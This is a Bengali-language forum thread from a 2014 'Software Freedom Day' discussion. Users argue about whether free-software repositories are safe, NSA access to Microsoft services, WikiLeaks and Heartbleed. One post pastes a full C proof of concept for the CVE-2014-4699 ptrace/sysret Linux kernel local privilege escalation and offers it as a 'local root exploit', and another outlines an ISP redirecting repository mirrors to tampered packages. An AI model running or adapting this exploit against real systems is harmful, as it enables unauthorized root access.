২১

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

FinFisher

FinFisher (formerly part of the UK based Gamma Group International until late 2013) is a German company that produces and sells computer intrusion systems, software exploits and remote monitoring systems that are capable of intercepting communications and data from OS X, Windows and Linux computers as well as Android, iOS, BlackBerry, Symbian and Windows Mobile devices.

wikileaks

২২

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

অরুণ লিখেছেন:

এই মানসিকতার জন্যই আপনি এখনও xpতে পড়ে আছেন..... দাসত্ব থেকে মুক্তি পেলেন না...  kidding  hehe  lol

মানব ইতিহাসের সেরা ওএসকে বাদ দিতে মন চায় না। এখন মাইক্রোসফটের উচিৎ এক্সপি কে ফ্রি বলে ঘোষনা দেওয়া।

লেখাটি LGPL এর অধীনে প্রকাশিত

২৩

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

রিং লিখেছেন:

যোদ্ধা বলতে যদি আপনি সরাসরি অস্ত্রহাতে যুদ্ধে নামা বোঝেন তবে আর কিছুই বলবার নেই। গুগল তাঁর ব্যবহারকারীদের তথ্যের নিরাপত্তা দিতে গিয়ে মার্কিন গোয়েন্দা সংস্থার বিরুদ্ধে কোর্টে যাওয়ায় মার্কিন সরকার কর্তৃক সরাসরি ""দেশপ্রেমিক নয়'' আখ্যা পেয়ে বসে আছে। স্বেচ্ছাসেবা আর ব্যবসায়িক প্রতিষ্ঠানের কর্মপদ্ধতি আর নীতিমালা বিবেচনায় রেখে মুক্তপ্রযুক্তির আন্দোলনে গুগলের অবদানটুকু সময়সুযোগ মতো জানবার চেষ্টা করুন। আশা করি তখন আর আমার কথাগুলো অতটা তিক্ত ঠেকবে না।

গুগলের প্রাইভেসি লংঘন মানে কেবল এন.এস.একে তথ্য দেয়া নিশ্চয়ই নয়। তা ভাই দেশপ্রেমিক নয় হিসাবে কেবল গুগলই এল কেন ওদের সহযোগী হিসাবে মাইক্রোসফটের নামটাওতো আসা উচিত ছিল। ওপেন সোর্সে গুগলের মত না হলেও অল্প বিস্তর হলেও অবদান মাইক্রোসফটেরও আছে যেমন -  Hadoop, Samba এবং খোদ লিনাক্স।

Pro bono

২৪ সর্বশেষ সম্পাদনা করেছেন রিং (১৬-০৯-২০১৪ ২২:৪২)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

মেহেদী৮৩ লিখেছেন:
তৌফিক ইমাম লিখেছেন:

প্রোগ্রাম ম্যানিপুলেট করুক, কিন্তু মেইন রিপোতে সেই  ম্যানিপুলেট করা প্রোগ্রাম ইচ্ছা করলেই ঢুকানো যায় নাকি?

মনে করেন, স্কাইপ সেটাপ করবেন, লেটেষ্ট ভার্সন মাইক্রোসফটের সাইট থেকেই নামালেন। বাকিটুকু আর নাই কইলাম। tongue

প্রিয় মেহেদী৮৩ ভাই, মেইন রিপোতে না থাকলেই তো সাধারন ব্যবহারকারীরা অভিজ্ঞতা না থাকায় সচরাচর তৃতীয় পক্ষের রিপো নিয়ে নাড়াচাড়ায় যাবে না। মেইন রিপো নিরাপদ কি না সেই প্রশ্নের উত্তরে তৃতীয় পক্ষের রিপো টেনে উদাহরন দেয়াটা একটু বাহুল্য হচ্ছে না কি?

তৌফিক ইমামের আগ্রহটা ছিলো মুক্ত সফটওয়্যার রিপোজিটরী তে থাকা সফটওয়্যারের নিরাপত্তা নিয়ে। মুক্ত সফটওয়্যার রিপোরজিটরীতে তৃতীয় পক্ষের দেয়া ক্ষতিকারক প্রোগ্রাম ইনজেক্ট বা অনুপ্রবেশ ঘটিয়ে দেয়া সম্ভব কি না সেটাই তিনি স্পষ্ট করে জানতে চাইছিলেন। আমার মনে হয়নি যে তৌফিক ইমামের প্রশ্ন কোট করে দেয়া আপনার এই উত্তরটা সরাসরি ওনার প্রশ্নের জবাব ছিলো আর তাই আমার বক্তব্যগুলো শুধুমাত্র আপনার বক্তব্যে শুরু হওয়া মনের বিভ্রান্তি দূর করতেই করা ছিলো, অন্য কিছু নয়।

আশা করি আমার কথাগুলোকে একেবারেই ব্যক্তিগত পর্যায়ের রেষারেষি হিসাবে নেবেন না। আমি শুধুমাত্র চাইছিলাম যেনো আপনার কথার এই লগ ধরে কোন নবীন ব্যবহারকারী এটা ধারনা করে না বসেন যে, যে কোন ব্যক্তি বা প্রতিষ্ঠান চাইলেই নিজের ক্ষতিকারক সফটওয়্যার/টুলস সরাসরি মুক্তপ্রযুক্তি ভিত্তিক রিপোজিটরীগুলোয় যুক্ত করে দিতে পারে। এটা যে মোটামুটি অসম্ভব পর্যায়ের একটা কাজ সেটুকু স্পষ্ট করে বোঝাতেই আমি এতক্ষন কথা বলছিলাম।

রিং'এর ওয়েবসাইট

লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত

২৫ সর্বশেষ সম্পাদনা করেছেন সাইফুল_বিডি (১৭-০৯-২০১৪ ০০:০৬)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

তৌফিক ইমাম লিখেছেন:

১।  এনক্রিপটেড কিংবা টানেলড ডাটাও দেখতে পায়? (সব ও এস এর জন্যই প্রযোজ্য )

২। প্রোগ্রাম ম্যানিপুলেট করুক, কিন্তু মেইন রিপোতে সেই  ম্যানিপুলেট করা প্রোগ্রাম ইচ্ছা করলেই ঢুকানো যায় নাকি? :p
( hash চেকিং এর ব্যাপার না হয় বাদই দিলাম)

১। যায় দাদা।
২। DNS স্পুফিং / DNS হাইজেকিং এর ব্যাপারটা জানেন ? আপনাকে দেখাবে যে আপনি দাদা বাড়ী যাচ্ছেন , কিন্তু আপনাকে নানাবাড়ী পাঠিয়ে দিবে।
প্যাচালে যেতে চাচ্ছি না, তাই অফ যাচ্ছি।

@শামিম দাদা, আমি কারো প্রাইভেট ডাটাতে হাত দেওয়া সমর্থন করিনা।
একটা ব্যাপার আমাদের উইকিলিক্স ডাটা কিভাবে কালেক্ট করেন সেটা তো জানেন তাইনা? ওটা কি প্রাইভেসির আওতায় পড়ে না ?  সে তো একেকটা দেশের সরকার নিয়ে কানামাছি খেলছে।

আচ্ছা মাইক্রোসফট যে পাব্লিকের ডাটা NSA এর কাছে বেচে দিচ্ছে এটার ব্যাপারে জানতে চাচ্ছি। ডাটা কি আমার পিসি থেকে মেরে দিচ্ছে ? আমার ফায়ারওয়ালে আপডেট দেওয়ার সময় ছাড়া কখনো মাইক্রোসফট এর সাইটের ডাটা ট্রান্সমিট হতে দেখি না। কেউ বলবেন কি কিভাবে ধরতে পারি এই চুরি ?

এই ব্যাক্তির সকল লেখা কাল্পনিক , জীবিত অথবা মৃত কারো সাথে মিল পাওয়া গেলে তা সম্পুর্ন কাকতালীয়, যদি লেখা জীবিত অথবা মৃত কারো সাথে মিলে যায় তার দায় এই আইডির মালিক কোনক্রমেই বহন করবেন না। এই ব্যক্তির সকল লেখা পাগলের প্রলাপের ন্যায় এই লেখা কোন প্রকার মতপ্রকাশ অথবা রেফারেন্স হিসাবে ব্যবহার করা যাবে না।

২৬ সর্বশেষ সম্পাদনা করেছেন রিং (১৭-০৯-২০১৪ ০০:২৮)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

সাইফুল_বিডি লিখেছেন:
তৌফিক ইমাম লিখেছেন:

২। প্রোগ্রাম ম্যানিপুলেট করুক, কিন্তু মেইন রিপোতে সেই  ম্যানিপুলেট করা প্রোগ্রাম ইচ্ছা করলেই ঢুকানো যায় নাকি? :p
( hash চেকিং এর ব্যাপার না হয় বাদই দিলাম)

২। DNS স্পুফিং / DNS হাইজেকিং এর ব্যাপারটা জানেন ? আপনাকে দেখাবে যে আপনি দাদা বাড়ী যাচ্ছেন , কিন্তু আপনাকে নানাবাড়ী পাঠিয়ে দিবে। প্যাচালে যেতে চাচ্ছি না, তাই অফ যাচ্ছি।

মুক্ত সফটওয়্যার রিপোতে ম্যানিপুলেট করা/ক্ষতিকারক কোড যুক্ত হওয়া প্রোগ্রাম/টুলস কিভাবে যুক্ত করতে হয় সেই বিষয়ক টিউটোরিয়াল/নির্দেশনা চাই। যদি ঘুষখোর কোন প্যাকেজ মেইনটেইনারের তথ্য থাকে তো গো.বা তে দিয়েন। হাজার হোক বাঙ্গালি বুদ্ধি তো, কোন দিন কোন কাজে লেগে যায়!!!  big_smile

আর কিভাবে ডেক্সটপ/ডিভাইসে রান করা মুক্তপ্রযুক্তি ভিত্তিক প্রোগ্রাম ডিএনএস স্পুফিং করে জানতে চাই। ক্রোমিয়াম কিংবা ফায়ারফক্স প্রোগ্রাম ব্যবহার করে ব্যবহারকারী নয় বরংচ ক্রোমিয়াম কিংবা ফায়ারফক্স সরাসরি কিভাবে এই ধরনের কাজে ব্যবহাকারীকে ধোঁকা দিতে সহায়তা করে/করেছে সেই বিষয়টা একটু বিস্তারিত যদি বলতেন?

সাইফুল_বিডি লিখেছেন:

@শামিম দাদা, আমি কারো প্রাইভেট ডাটাতে হাত দেওয়া সমর্থন করিনা।
একটা ব্যাপার আমাদের উইকিলিক্স ডাটা কিভাবে কালেক্ট করেন সেটা তো জানেন তাইনা? ওটা কি প্রাইভেসির আওতায় পড়ে না ?  সে তো একেকটা দেশের সরকার নিয়ে কানামাছি খেলছে।

উইকিলিকস কোন তথ্য গুগল বা ফেসবুকের মতো সরাসরি সংগ্রহ করে না কিংবা বলা যায় ওঁদেরকে কেউ তথ্য যেচে দিলে তবেই সেটা নেয়া হয়। তথ্যগুলো যাচাই বাছাই করে নিশ্চিত হবার পর সেগুলো তথ্য সরবরাহকারীর তথ্য শুধুমাত্র গোপন নয় বরংচ একেবারে নিশ্চিহ্ন করে তারপরই তথ্যগুলো লিক/প্রকাশ করা হয়। এক্ষেত্রে ব্যক্তিগত তথ্যের নিরাপত্তা লংঘিত হচ্ছে না সেটা পূর্ণরূপে নিশ্চিত করে উইকিলিকস।

ইংরেজী "প্রাইভেট' শব্দটা ব্যবহৃত হয় ব্যক্তি তথ্য বা একান্ত ব্যক্তিগত কিছু বোঝাতে। সরকারী বা জনসাধারনের বা সামগ্রিক বা সাংগঠনিক তথ্যের ক্ষেত্রে এগুলোকে বলে "ক্লাসিফাইড' বা "গোপনীয় তথ্য'। দুটো কাছাকাছি হলেও একই জিনিষ না।

জনসাধারন কিংবা জনগোষ্ঠীর বিরুদ্ধে করা কিংবা করার পরিকল্পনার দালিলিক প্রমানগুলোকেই সাধারনত ক্ষমতাসীনেরা অনেক চেষ্টা চরিত্র করে "ক্লাসিফাইড' বা "গোপনীয় তথ্য' হিসেবে লুকানো/আড়ালের প্রচেষ্টা চালান। আপনার কি মনে হয় এই অপকর্মগুলো ঠিকঠাক মতো ঢেকে রাখাই সঠিক?

সাইফুল_বিডি লিখেছেন:

আচ্ছা মাইক্রোসফট যে পাব্লিকের ডাটা NSA এর কাছে বেচে দিচ্ছে এটার ব্যাপারে জানতে চাচ্ছি। ডাটা কি আমার পিসি থেকে মেরে দিচ্ছে ? আমার ফায়ারওয়ালে আপডেট দেওয়ার সময় ছাড়া কখনো মাইক্রোসফট এর সাইটের ডাটা ট্রান্সমিট হতে দেখি না। কেউ বলবেন কি কিভাবে ধরতে পারি এই চুরি?

এইখান থেকে একটু ঘুরে আসেন। এখানে মূলকথাগুলো যা বলেছে --

• Microsoft helped the NSA to circumvent its encryption to address concerns that the agency would be unable to intercept web chats on the new Outlook.com portal;

• The agency already had pre-encryption stage access to email on Outlook.com, including Hotmail;

• The company worked with the FBI this year to allow the NSA easier access via Prism to its cloud storage service SkyDrive, which now has more than 250 million users worldwide;

• Microsoft also worked with the FBI's Data Intercept Unit to "understand" potential issues with a feature in Outlook.com that allows users to create email aliases;

• In July last year, nine months after Microsoft bought Skype, the NSA boasted that a new capability had tripled the amount of Skype video calls being collected through Prism;

• Material collected through Prism is routinely shared with the FBI and CIA, with one NSA document describing the program as a "team sport".

এইটা, এইটা এবং এইটাও একটু দেইখেন।
আপনি যদি এমএস এর স্কাইড্রাইভ প্রযুক্তি ব্যবহার করে থাকেন তবে নিজের সিস্টেম ডিস্কে থাকা তথ্যের সাথে ওটাকে নিয়মিত হালনাগাদ করার বা হার্ডডিস্কে রিডরাইট করার অনুমোদন তো দিয়েই থাকেন। বাকীটা বুঝে নিতে আশা করি কষ্ট হবে না।

রিং'এর ওয়েবসাইট

লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত

২৭ সর্বশেষ সম্পাদনা করেছেন সাইফুল_বিডি (১৭-০৯-২০১৪ ০০:৪৬)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

রিং লিখেছেন:

মুক্ত সফটওয়্যার রিপোতে ম্যানিপুলেট করা/ক্ষতিকারক কোড যুক্ত হওয়া প্রোগ্রাম/টুলস কিভাবে যুক্ত করতে হয় সেই বিষয়ক টিউটোরিয়াল/নির্দেশনা চাই।

আপনি চাইলেই তো আমি লিনাক্স কার্নেল ৩.১৭ এর রুট এক্সপ্লোয়িট দিয়ে দিব না।

রিং লিখেছেন:

আর কিভাবে ডেক্সটপ/ডিভাইসে রান করা মুক্তপ্রযুক্তি ভিত্তিক প্রোগ্রাম ডিএনএস স্পুফিং করে জানতে চাই। ক্রোমিয়াম কিংবা ফায়ারফক্স প্রোগ্রাম ব্যবহার করে ব্যবহারকারী নয় বরংচ ক্রোমিয়াম কিংবা ফায়ারফক্স সরাসরি কিভাবে এই ধরনের কাজে ব্যবহাকারীকে ধোঁকা দিতে সহায়তা করে/করেছে সেই বিষয়টা একটু বিস্তারিত যদি বলতেন?


২০১০ টাইগার মেট (সার্চ করেন এটাই এনাফ)
আপনার ISP চাইলেই আপনাকে ফেইক গুগোলে পাঠিয়ে দিতে পারে। যার এড্রেস সেম অরিজিনাল গুগোলের মতই।

রিং লিখেছেন:

উইকিলিকস কোন তথ্য গুগল বা ফেসবুকের মতো সরাসরি সংগ্রহ করে না কিংবা বলা যায় ওঁদেরকে কেউ তথ্য যেচে দিলে তবেই সেটা নেয়া হয়।

তাই নাকি ? তাইলে  এনোনিমাস তাদেরকে ডাটা কোথা থেকে দিল ? এই  যে 678,000 ইমেইল গুলো কি তাদের মালিকরা এ্যনোনিমাসের কাছে পাঠিয়ে দিয়েছে ?

আপনি যদি এমএস এর স্কাইড্রাইভ প্রযুক্তি ব্যবহার করে থাকেন তবে নিজের সিস্টেম ডিস্কে থাকা তথ্যের সাথে ওটাকে নিয়মিত হালনাগাদ করার বা হার্ডডিস্কে রিডরাইট করার অনুমোদন তো দিয়েই থাকেন। বাকীটা বুঝে নিতে আশা করি কষ্ট হবে না।

ওয়ান ড্রাইভ , গুগোল ড্রাইভ , কপি , ড্রপবক্স ব্লা ব্লা ব্লা ... কে কি রাইট পারমিশন দিতে হয় না ?

http://www.wnd.com/2013/06/nsa-has-tota … t-windows/
ADVAPI.DLL নামে কোন জিনিশ আমার সিস্টেমে দেখি নাই ।
আর হার্ডয়্যারে মানে চিপে যদি স্পাইওয়্যার প্রোগ্রাম করে দেয় সেটা কি কোন অপারেটিং সিস্টেমের জন্য ফিক্সড ?
একটা কথা বলি , আপনি যদি ব্যাকডোর দেখতে পান তাহলে সেটা দেখিয়ে দিন, আমি রিমুভ মারি। যদি সিস্টেম ফল্ট করে তাইলে পয়সা দিয়ে কেনা ৮ ফেলে দিব। ২ টা ফায়ারওয়াল ব্যবহার করি কে কি নিচ্ছে দেখার জন্য।

এই ব্যাক্তির সকল লেখা কাল্পনিক , জীবিত অথবা মৃত কারো সাথে মিল পাওয়া গেলে তা সম্পুর্ন কাকতালীয়, যদি লেখা জীবিত অথবা মৃত কারো সাথে মিলে যায় তার দায় এই আইডির মালিক কোনক্রমেই বহন করবেন না। এই ব্যক্তির সকল লেখা পাগলের প্রলাপের ন্যায় এই লেখা কোন প্রকার মতপ্রকাশ অথবা রেফারেন্স হিসাবে ব্যবহার করা যাবে না।

২৮ সর্বশেষ সম্পাদনা করেছেন রিং (১৭-০৯-২০১৪ ০১:০২)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

সাইফুল_বিডি লিখেছেন:

আপনি চাইলেই তো আমি লিনাক্স কার্নেল ৩.১৭ এর রুট এক্সপ্লোয়িট দিয়ে দিব না।

ভাই এখন অবদি স্টেবল আর রিপো তে আসা কার্নেল হলো ৩.১৬.২। আপনি তো দেখি আরসি বা রিলিজ ক্যান্ডিডেট নিয়ে মাতামাতি জুড়ে দিয়েছেন। যাই হোক যদি আদৌ কোন ফোঁকড় খুঁজে পেয়ে থাকেন তবে অনুগ্রহ করে আপনি সেটাকে রিপোর্ট না করে বসে থাকুন। দেখুন তো রিলিজ হবার পর আপনার সেই রুট এক্সপ্লয়েট কাজ করে কি না?

আর আপনি যেদিন ওই সংস্করনটা ইন্সটল করবেন তো জানাবেন। আমি নিজেও একই সংস্করন আমার পছন্দের রিপো থেকে নামিয়ে নিয়ে ইন্সটল করবো আমার সিস্টেমে। তারপর দেখবার ইচ্ছে যে সেই এক্সপ্লয়েট ব্যবহার করে আপনি কতটা তথ্য হাতিয়ে নেন আমার ব্যক্তিগত সিস্টেম থেকে কিংবা আমার সিস্টেমের ক্ষতিসাধন করেন।

আর সাইফুল_বিডি ভাই, আমি জানতে চেয়েছিলাম যে নিজের ডেস্কটপে নয় বরংচ মুক্ত সফটওয়্যার রিপোতে ম্যানিপুলেট করা/ক্ষতিকারক কোড যুক্ত হওয়া প্রোগ্রাম/টুলস কিভাবে যুক্ত করতে হয় সেই বিষয়ক টিউটোরিয়াল/নির্দেশনা। আশা করি গো.বা দিয়ে হলেও পরামর্শটা দেবেন।

সাইফুল_বিডি লিখেছেন:

২০১০ টাইগার মেট (সার্চ করেন এটাই এনাফ)। আপনার ISP চাইলেই আপনাকে ফেইক গুগোলে পাঠিয়ে দিতে পারে। যার এড্রেস সেম অরিজিনাল গুগোলের মতই।

ভাই আমি ডিএনএস স্পুফিং এর সাথে ডেক্সটপ/ডিভাইসে রান করা মুক্তপ্রযুক্তি ভিত্তিক প্রোগ্রামের লিংক/সম্পর্কটা জানতে চাইছিলাম। উদাহরন হিসেবে ক্রোমিয়াম কিংবা ফায়ারফক্স সরাসরি কিভাবে এই ধরনের কাজে ব্যবহাকারীকে ধোঁকা দিতে সহায়তা করে/করেছে সেই বিষয়টা একটু বিস্তারিত আলোকপাত করলে কিংবা দুটো লিংক ধরিয়ে দিলে খুবই উপকৃত হতাম।

মূলত আমার জানতে চাইবার আগ্রহ এই জন্যে যে মুক্তপ্রযুক্তি যে সব সফটওয়্যার আমি ব্যবহার করছি বিগত প্রায় একযুগেরও বেশী সময় ধরে সেগুলোর বিরুদ্ধে এই রকমের অপকর্মে সরাসরি কিংবা পরোক্ষভাবে যুক্ত থাকার বিষয়ে কিছুই জানিনা। কখনো সখনো যদি বাগ/ত্রুটি ধরা পড়েছে তো যথাজলদি সমাধা হতেই দেখেছি। যদি আপনার কাছ থেকে পরামর্শ পেয়ে নতুন কিছু বিষয়ে জানতে-শিখতে পারি তো খুবই খুশি হবো।

সাইফুল_বিডি লিখেছেন:
রিং লিখেছেন:

উইকিলিকস কোন তথ্য গুগল বা ফেসবুকের মতো সরাসরি সংগ্রহ করে না কিংবা বলা যায় ওঁদেরকে কেউ তথ্য যেচে দিলে তবেই সেটা নেয়া হয়।

তাই নাকি ? তাইলে এনোনিমাস তাদেরকে ডাটা কোথা থেকে দিল ? এই মে678,000 ইলগুলো কি তাদের মালিকরা এ্যনোনিমাসের কাছে পাঠিয়ে দিয়েছে ?

ভাই আশা করি anonymous শব্দটার অর্থ জানা আছে আর আপনারই দেয়া লিংক থেকে এইটুকু কেটে নিয়ে উল্লেখ করছি -- ""anonymous-hackers-help-wikileaks-to-get ''।

রিং'এর ওয়েবসাইট

লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত

২৯ সর্বশেষ সম্পাদনা করেছেন উন্মাতাল_তারুণ্য (১৭-০৯-২০১৪ ০১:১৬)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

আমি বড় মানুষ একটা ছোট কথা জানতে চাই। শুনেছি heartbleed ওয়ালা OpenSSL নাকি রিপোতে পাওয়া যাইত? এইটা নাকি মুক্ত মানুষের বদলে একটা সরকারি এজেন্সি আবিষ্কার করছিল? তাইলে রিপো মেইনটেইনাররা কি করতেছিল?

মুক্ত সফটওয়্যার ভাল জিনিস। এর প্রচারে ঢোল-বাদ্যি বাজানোও ভাল জিনিস। কিন্তু বাজনার তাল-লয়-মাত্রা জ্ঞান থাকা আবশ্যক। তবলার উপর চাটি মারতে পারলেই কি আর তবলচি হওয়া যায়? সেটা কি মানুষকে বিরক্তি বৈ আনন্দ দিতে পারে?

" 'কত বড়ো আমি' কহে নকল হীরাটি। তাই তো সন্দেহ করি নহ ঠিক খাঁটি॥ " - রবীন্দ্রনাথ ঠাকুর

৩০

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

আহা, কতিপয় জ্ঞানী ব্যাক্তির সিকিউরিটি সম্পর্কে জ্ঞান দেখে চোখে পানি চলে আসলো।

আমি পাগল - কোন সমস্যা?

৩১

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

/**
 * CVE-2014-4699 ptrace/sysret PoC
 * by Vitaly Nikolenko
 * vnik@hashcrack.org
 *
 * > gcc -O2 poc_v0.c
 *
 * This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the
 * following will trigger the #GP in sysret and overwrite the #PF handler so we
 * can land to our NOP sled mapped at 0x80000000.
 * However, once landed, the IDT will be trashed. We can either attempt to
 * restore it (then escalate privileges and execute our shellcode) or find
 * something else to overwrite that would transfer exec flow to our controlled
 * user-space address. Since 3.10.something, IDT is read-only anyway. If you
 * have any ideas, let me know.
 */
   
#include <stdio.h>
#include <stdint.h>
#include <assert.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <unistd.h>
#include <sys/mman.h>
#include <errno.h>
  
#define SIZE  0x10000000
  
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);
  
unsigned long __user_cs;
unsigned long __user_ss;
unsigned long __user_rflags;
  
void __attribute__((regparm(3))) payload() {
    uint32_t *fixptr = (void*)0xffffffff81dd70e8;
    // restore the #PF handler
    *fixptr = -1;
    //commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff81091630;
    //prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff810918e0;
    //commit_creds(prepare_kernel_cred((uint64_t)NULL));
  
    //__asm__ volatile ("swapgs\n\t"
    //        "...");
}
  
int main() {
    struct user_regs_struct regs;
    uint8_t *trampoline, *tmp;
    int status;
  
    struct {
        uint16_t limit;
        uint64_t addr;
    } __attribute__((packed)) idt;
  
        // MAP_POPULATE so we don't trigger extra #PF
    trampoline = mmap(0x80000000, SIZE, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);
    assert(trampoline == 0x80000000);
    memset(trampoline, 0x90, SIZE);
        tmp = trampoline;
        tmp += SIZE-1024;
        memcpy(tmp, &payload, 1024);
    memcpy(tmp-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);
  
    pid_t chld;
  
        if ((chld = fork()) < 0) {
        perror("fork");
        exit(1);
    }
      
    if (chld == 0) {
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {
            perror("PTRACE_TRACEME");
            exit(1);
        }
        raise(SIGSTOP);
        fork();
        return 0;
    }
  
    asm volatile("sidt %0" : "=m" (idt));
    printf("IDT addr = 0x%lx\n", idt.addr);
  
    waitpid(chld, &status, 0);
  
    ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK);
  
    ptrace(PTRACE_CONT, chld, 0, 0);
  
    waitpid(chld, &status, 0);
  
        ptrace(PTRACE_GETREGS, chld, NULL, &regs);
    regs.rdi = 0x0000000000000000;
    regs.rip = 0x8fffffffffffffff;
    regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78;
  
    // attempt to restore the IDT
    regs.rdi = 0x0000000000000000;
    regs.rsi = 0x81658e000010cbd0;
    regs.rdx = 0x00000000ffffffff;
    regs.rcx = 0x81658e000010cba0;
    regs.rax = 0x00000000ffffffff;
    regs.r8  = 0x81658e010010cb00;
    regs.r9  = 0x00000000ffffffff;
    regs.r10 = 0x81668e0000106b10;
    regs.r11 = 0x00000000ffffffff;
    regs.rbx = 0x81668e0000106ac0;
    regs.rbp = 0x00000000ffffffff;
    regs.r12 = 0x81668e0000106ac0;
    regs.r13 = 0x00000000ffffffff;
    regs.r14 = 0x81668e0200106a90;
    regs.r15 = 0x00000000ffffffff;
  
        ptrace(PTRACE_SETREGS, chld, NULL, &regs);
  
    ptrace(PTRACE_CONT, chld, 0, 0);
  
    ptrace(PTRACE_DETACH, chld, 0, 0);
}

3.15.4 এর লোকাল রুট এক্সপ্লইট , দেখেন তো কিছু করতে পারেন কিনা (৩.১৫.৪ এ)।

anonymous  শব্দটা একটু আপেক্ষিক , হ্যাকার কমিউনিটিতে anonymous কিভাবে ডাটা দিল এর মানে আছে। আর বাকীদের কাছে এটা না বুঝাটা দোষের না। anonymous একটা গ্রুপের নাম।


রিং লিখেছেন:

উদাহরন হিসেবে ক্রোমিয়াম কিংবা ফায়ারফক্স সরাসরি কিভাবে এই ধরনের কাজে ব্যবহাকারীকে ধোঁকা দিতে সহায়তা করে/করেছে সেই বিষয়টা একটু বিস্তারিত আলোকপাত করলে কিংবা দুটো লিংক ধরিয়ে দিলে খুবই উপকৃত হতাম।

স্পুফিং এর সাথে মজিলা / ক্রোমের সম্পর্ক কি সেটাই বুঝলাম না।
আপনাকে বুঝাই , যেহেতু আপনি গরিব মানুষ VPN / প্রাইভেট টানেল ব্যবহার করার ক্ষমতা আপনার নাই, সেহেতু আপনি আপনার লোকাল ISP র লাইন দিয়ে লিনাক্স এর মেইন রেপোতে ডুকলেন। এবার মুল কাহিনিতে আশা যাক, মনে করুন আমি সেই ISP মালিক, আমি আপনার কাঙ্খিত রেপোটির একটি মিরর করে আমার ISP সার্ভারে আপ করলাম , এবার আপনার রেপোটির লিংক সরাসরি হোস্ট মডিফাই করে আমার সার্ভারে লোকেট করে দিলাম। আর কিছু বলতে হবে ?

Anonymous supplies WikiLeaks wi..... এর মানে এই না যে এরা Anonymous হ্যাকার , এখানে Anonymous হ্যাকার গ্রুপকে ইন্ডিকেট করা হয়েছে।
এখানে Anonymous এর ক্লেইম দেখতে পারেন।

Anonymous hacktivists claimed responsibility for accessing the information and passing it on to the whistleblower organization.

এই ব্যাক্তির সকল লেখা কাল্পনিক , জীবিত অথবা মৃত কারো সাথে মিল পাওয়া গেলে তা সম্পুর্ন কাকতালীয়, যদি লেখা জীবিত অথবা মৃত কারো সাথে মিলে যায় তার দায় এই আইডির মালিক কোনক্রমেই বহন করবেন না। এই ব্যক্তির সকল লেখা পাগলের প্রলাপের ন্যায় এই লেখা কোন প্রকার মতপ্রকাশ অথবা রেফারেন্স হিসাবে ব্যবহার করা যাবে না।

৩২ সর্বশেষ সম্পাদনা করেছেন রিং (১৭-০৯-২০১৪ ০২:৪০)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

উন্মাতাল_তারুণ্য লিখেছেন:

আমি বড় মানুষ একটা ছোট কথা জানতে চাই। শুনেছি heartbleed ওয়ালা OpenSSL নাকি রিপোতে পাওয়া যাইত? এইটা নাকি মুক্ত মানুষের বদলে একটা সরকারি এজেন্সি আবিষ্কার করছিল? তাইলে রিপো মেইনটেইনাররা কি করতেছিল?

ভাই শাবাব, এইখান থেকে একটু দেখে নিলে জানতে ও জানাতে সুবিধা হতো। এই ওপেন এসএসএল ডেক্সটপ কম্পিউটিংয়ে ব্যবহৃত কোন নিয়মিত সফটওয়্যার বা টুলস নয় ফলে সাধারন ব্যবহারকারীদের কম্পিউটারে এটার দ্বারা কোনরূপ কোন ক্ষতিসাধনের সম্ভাবনা প্রায় নেই বললেই চলে। তবে হ্যাঁ এটা ঠিক যে অনলাইনে ব্যক্তিতথ্যের নিরাপত্তা অবশ্যই উভয়প্রান্তেই ক্ষতিগ্রস্ত হয়েছে। তদুপরি --

What versions of the OpenSSL are affected?

Status of different versions:

    OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
    OpenSSL 1.0.1g is NOT vulnerable
    OpenSSL 1.0.0 branch is NOT vulnerable
    OpenSSL 0.9.8 branch is NOT vulnerable

এই সফটওয়্যারের ত্রুটিটুকু এঁরাই

This bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security, who first reported it to the OpenSSL team. Codenomicon team found heartbleed bug while improving the SafeGuard feature in Codenomicon's Defensics security testing tools and reported this bug to the NCSC-FI for vulnerability coordination and reporting to OpenSSL team.

